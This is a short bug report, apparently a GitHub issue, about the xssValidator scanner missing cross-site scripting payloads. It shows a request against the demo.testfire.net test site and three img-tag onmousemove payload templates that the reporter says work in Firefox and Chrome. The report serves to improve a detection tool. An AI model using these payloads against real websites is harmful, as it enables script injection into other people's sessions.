False Negative
nslearnner opened this issue · 0 comments
nslearnner commented
Demo Site: demo.testfire.net
Full Request is:
http://demo.testfire.net/search.aspx?txtSearch=%3cimg%20src%3d8%20onmousemove%3d%22alert(299792458)%22%3e
Payloads below:
<img src=1 onmousemove="{JAVASCRIPT}">
<img src=1 onmousemove='{JAVASCRIPT}'>
<img src=1 onmousemove={JAVASCRIPT}>
I tested on FF and Chrome, and the payloads work. But xssValidator can't detect them.
How can I fix it?
Some info:
Firefox: v51.0.1
Chrome: v56.0.2924.87
xssValidator: v1.3.2
PhantomJS: v2.1.1